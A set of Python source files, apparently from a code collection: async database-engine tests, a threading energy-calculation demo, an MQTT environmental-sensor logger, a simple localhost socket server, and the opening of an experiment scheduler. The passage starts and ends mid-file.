with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = engines.testing_engine(asyncio=True, transfer_staticpool=True)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = engines.testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
                await trans.rollback()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
def test_async_engine_from_config(self):
config = {
"sqlalchemy.url": str(testing.db.url),
"sqlalchemy.echo": "true",
}
engine = async_engine_from_config(config)
assert engine.url == testing.db.url
assert engine.echo is True
assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
TempChange.py
|
import threading
import time
def check_energy():
""" Gets the mass and change information from list (version 2 will use other process)
Then calculates the energy needed (in Joules) & displays
Finally checks if user is finished, if not re-run after 1 seconds
WE ARE USING: A count of 24 with a wait of 1 second to mimic 24 hours & once an hour
:return: False = sets flag allowing program to exit
"""
for i in range(24):
water_mass = 46.1 - i
temp_change = i + .25
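        # Q = c * m * dT, with c = 4.186 J/(g*°C), the specific heat of water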
energy = 4.186 * water_mass * temp_change
print(f"The energy was {energy}")
time.sleep(1)
"""
Calculates the energy used when changing temp of water
- waits 1 seconds then repeats operation 24 times (mimicing an every hour check & log)
- Feel free to try a longer process when you get this working
- This is basically our Module 2 program as a thread
Note, if using Windows (and not a VM or subsystem of Linux) this may have a slight delay (10+ sec),
Then print all at once or when you open a different program.
I will talk about the workaround in class but its not required or included here.
"""
### Could add an `if __name__ == '__main__':` guard here if you don't want this to run on import
print("Starting new daily Temp Log")
threading.Thread(target=check_energy).start()
|
logger.py
|
import collections
import threading
import traceback
import json
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples, room, retain):
self.bme280 = BME280()
self.client_id = client_id
self.prefix = prefix
self.room = room
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
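        # A fixed-length deque acts as a sliding window: update() publishes the
        # average of the last `num_samples` readings per topic.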
self.latest_pms_readings = {}
self.use_pms5003 = use_pms5003
if self.use_pms5003:
self.pm_thread = threading.Thread(
target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
self.retain = retain
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
        If the sensor is not polled continuously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"pm10": pm_data.pm_ug_per_m3(
1.0), #, atmospheric_environment=True),
"pm25": pm_data.pm_ug_per_m3(
2.5), #, atmospheric_environment=True),
"pm100": pm_data.pm_ug_per_m3(
10), #, atmospheric_environment=True),
}
            except Exception:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def remove_sensor_config(self):
"""
        Remove the previous config topic created for each sensor
"""
print("removed")
sensors = [
"proximity",
"lux",
"temperature",
"pressure",
"humidity",
"oxidising",
"reducing",
"nh3",
"pm10",
"pm25",
"pm100",
]
for sensor in sensors:
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, '', self.retain)
def sensor_config(self):
"""
Create config topic for each sensor
"""
# homeassistant/sensor/livingRoom/temperature/config
# homeassistant/sensor/livingRoom/temperature/state
# homeassistant/livingroom/enviroplus/state
sensors = {
"proximity": {
"unit_of_measurement": "cm",
"value_template": "{{ value_json }}"
},
"lux": {
"device_class": "illuminance",
"unit_of_measurement": "lx",
"value_template": "{{ value_json }}",
"icon": "mdi:weather-sunny"
},
"temperature": {
"device_class": "temperature",
"unit_of_measurement": "°C",
"value_template": "{{ value_json }}",
"icon": "mdi:thermometer"
},
"pressure": {
"device_class": "pressure",
"unit_of_measurement": "hPa",
"value_template": "{{ value_json }}",
"icon": "mdi:arrow-down-bold"
},
"humidity": {
"device_class": "humidity",
"unit_of_measurement": "%H",
"value_template": "{{ value_json }}",
"icon": "mdi:water-percent"
},
"oxidising": {
"unit_of_measurement": "no2",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"reducing": {
"unit_of_measurement": "CO",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"nh3": {
"unit_of_measurement": "nh3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
}
if self.use_pms5003:
sensors["pm10"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm25"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm100"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
try:
for sensor in sensors:
sensors[sensor]["name"] = f"{self.room} {sensor.capitalize()}"
sensors[sensor][
"state_topic"] = f"{self.prefix}/sensor/{self.room}/{sensor}/state"
sensors[sensor]["unique_id"] = f"{sensor}-{self.client_id}"
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, json.dumps(sensors[sensor]), self.retain)
print("Configs added")
        except Exception:
print("Failed to add configs.")
traceback.print_exc()
def take_readings(self):
hum_comp_factor = 1.3
readings = {}
try:
readings["proximity"] = ltr559.get_proximity()
except OSError:
print("Error reading proximity sensor data")
try:
readings["lux"] = ltr559.get_lux()
except OSError:
print("Error reading lux sensor data")
try:
readings["temperature"] = self.bme280.get_temperature()
except OSError:
print("Error reading temperature sensor data")
try:
readings["pressure"] = round(int(self.bme280.get_pressure() * 100), -1)
except OSError:
print("Error reading pressure sensor data")
try:
readings["humidity"] = round(int(self.bme280.get_humidity() * hum_comp_factor), 1)
except OSError:
print("Error reading humidity sensor data")
try:
gas_data = gas.read_all()
readings["oxidising"] = int(gas_data.oxidising / 1000)
readings["reducing"] = int(gas_data.reducing / 1000)
readings["nh3"] = int(gas_data.nh3 / 1000)
except OSError:
print("Error reading gas sensor data")
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value, retain):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value), retain=retain)
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
try:
value_sum = sum([d[topic] for d in self.samples])
value_avg = round(value_sum / len(self.samples), 1)
self.publish(f"sensor/{self.room}/{topic}/state", value_avg, self.retain)
except KeyError:
print(f"Error publishing data for {topic}")
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
|
server.py
|
#!/usr/bin/env python3
import socket
import threading
# The port that we want to bind to our server
PORT = 5050
# IP address of your computer
# SERVER = socket.gethostbyname(socket.gethostname())
SERVER = "127.0.0.1"
ADDR = (SERVER, PORT)
# Specification of my own custom protocol
HEADER_SIZE = 64
FORMAT = "utf-8"
DISCONNECT_MSG = "!DISCONNECT"
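# A client is expected to frame each message like this (a sketch, assuming the
# same constants on the client side):
#   msg = "hello".encode(FORMAT)
#   header = str(len(msg)).encode(FORMAT)
#   header += b" " * (HEADER_SIZE - len(header))  # pad the header to exactly 64 bytes
#   sock.send(header)
#   sock.send(msg)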
# create an INET, STREAMing socket (TCP/IP)
# AF_INET: Address Family of Internet Protocol v4
# SOCK_STREAM: TCP Socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to address
server.bind(ADDR)
def handle_client(conn, addr):
isConnected = True
print(f"[NEW CONNECTION] {addr} connected.")
# Keep receiving messages until the DISCONNECT_MSG arrives
    while isConnected:
        # First receive the size of the incoming message
        msgLength = conn.recv(HEADER_SIZE).decode(FORMAT)
        # An empty header means the client closed the socket without sending DISCONNECT_MSG
        if msgLength == "":
            break
        msgLength = int(msgLength)
        print(f"[MESSAGE LENGTH] {msgLength}")
        # Now receive the main message according to the size received above
        msg = conn.recv(msgLength).decode(FORMAT)
        if msg == DISCONNECT_MSG:
            isConnected = False
        print(f"[{addr}] {msg}")
# Close the client's socket connection
conn.close()
def start():
# Enable the server to accept connections
# Note: TCP is a connection-oriented protocol
server.listen()
print(f"[LISTENING] server is listening on {SERVER}")
while True:
# Wait for a new connection to the server
# conn: Connection to the client used for responding
# addr: Address of the client
conn, addr = server.accept()
# Create a separate thread for handling the new client connection
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
# Number of clients equals number of threads created for clients minus the main thread
clientsCount = threading.active_count() - 1
print(f"[ACTIVE CLIENT CONNECTIONS] {clientsCount}")
print("[STARTING] server is starting ...")
start()
|
system.py
|
"""
Copyright 2018 Banco Bilbao Vizcaya Argentaria, S.A.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# coding=utf-8
"""Launch experiments through an orchestrator."""
import threading
import time
import datetime
import logging
from .experiment import Experiment
from .dal import DAL
class System(threading.Thread):
def __init__(self, orchestrator, db, kafka_server):
threading.Thread.__init__(self)
self.logger = logging.getLogger("SCHEDULER")
self.orch = orchestrator
self.db = db
self.dal = DAL(db)
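        # DAL is presumably a data-access-layer wrapper around the db handle
        # (an assumption based on the name and how it is queried below).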
self.kafka_server = kafka_server
self.is_running = False
self.experiments_limit = 0
self.experiments_running = 0
# self.state_recovery()
def state_recovery(self):
"""
Recover the last state of the system.
"""
        # Update current state from the DB
system_parameters = self.dal.get_system_parameters()
self.is_running = system_parameters['running']
self.experiments_limit = system_parameters['experiments_limit']
pool = self.dal.get_running_experiments()
self.experiments_running = len(pool['running'])
for experiment_in_pool in pool['running']:
self.logger.warning('Experiments remaining in running pool.')
self.logger.warning('Trying to recover control')
experiment_info = self.dal.get_experiment(experiment_in_pool['experiment_id'])
experiment = Experiment(experiment_info, self.kafka_server, self.db, self.orch)
experiment.start()
self.experiments_running += 1
threading.Thread(target=experiment.control).start()
self.logger.info(
'Control recovered for experiment ' + experiment.name)
def run(self):
"""
Check the system status, and launch the experiments if possible.
"""
self.logger.info('READY TO LAUNCH EXPERIMENTS !!!!')
threading.Thread(target=self.monitor_running_experiments).start()
while True:
system_status = self.check_system()
self.logger.debug("System " + str(system_status[1])
+ " - Experiments: " + str(self.experiments_running)
+ " running, " + str(self.experiments_limit) + " max.")
if not system_status[0]:
time.sleep(5)
continue
experiment_id = self.dal.retrieve_experiment_from_queue()
if experiment_id:
self.logger.info("Retrieved experiment " + str(experiment_id) + " from queue.")
